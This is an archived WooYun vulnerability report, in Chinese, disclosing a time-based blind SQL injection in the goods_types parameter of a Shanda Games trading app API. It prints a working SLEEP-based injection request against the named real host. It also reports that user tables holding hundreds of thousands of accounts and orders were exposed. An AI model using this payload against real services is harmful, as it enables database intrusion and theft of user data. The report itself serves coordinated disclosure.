乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-01: 细节已通知厂商并且等待厂商处理中 2016-04-01: 厂商已经确认,细节仅向厂商公开 2016-04-11: 细节向核心白帽子及相关领域专家公开 2016-04-21: 细节向普通白帽子公开 2016-05-01: 细节向实习白帽子公开 2016-05-16: 细节向公众公开
APP安全之SQL注入
目标:盛大游戏G买卖IOS APP检测发现以下地方存在SQL注入:(URL中的goods_types,时间盲注)
GET http://gmm.sdo.com/api/accountapi/goods?app_version=2.2.0.33&method=GetMyGoodsList¶ms=%7B%22goods_types%22%3A%220*%22%2C%22page%22%3A1%2C%22state%22%3A1%7D&src_code=8 HTTP/1.1Cookie: PHPSESSID=eovdj9v072jf2t4ple19er9tv3; path=/; HttpOnlyX-Requested-With: XMLHttpRequestReferer: http://gmm.sdo.com/api/accountapi/goods?src_code=8&app_version=2.2.0.33&method=GetMyGoodsList¶ms=%7B%22state%22:0,%22goods_types%22:%2210,12%22,%22page%22:1%7DHost: gmm.sdo.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
Payload:(延时3秒)
GET http://gmm.sdo.com/api/accountapi/goods?app_version=2.2.0.33&method=GetMyGoodsList¶ms=%7B%22goods_types%22%3A%220)+AND+(SELECT+*+FROM+(SELECT(SLEEP(3)))v)+AND+(2054%3D2054%22%2C%22page%22%3A1%2C%22state%22%3A1%7D&src_code=8 HTTP/1.1Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateHost: gmm.sdo.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7Connection: closeX-Requested-With: XMLHttpRequestPragma: no-cacheCache-Control: no-cache,no-storeReferer: http://gmm.sdo.com/api/accountapi/goods?src_code=8&app_version=2.2.0.33&method=GetMyGoodsList¶ms={"state":0,"goods_types":"10,12","page":1}Cookie: PHPSESSID=eovdj9v072jf2t4ple19er9tv3; path=/; HttpOnly
1、当前数据库用户
2、所有数据库
3、用户表,涉及78W+用户/47W+交易订单
请多指教~
危害等级:高
漏洞Rank:20
确认时间:2016-04-01 10:17
感谢对盛大游戏的关注与支持安全没有愚人节0_0
暂无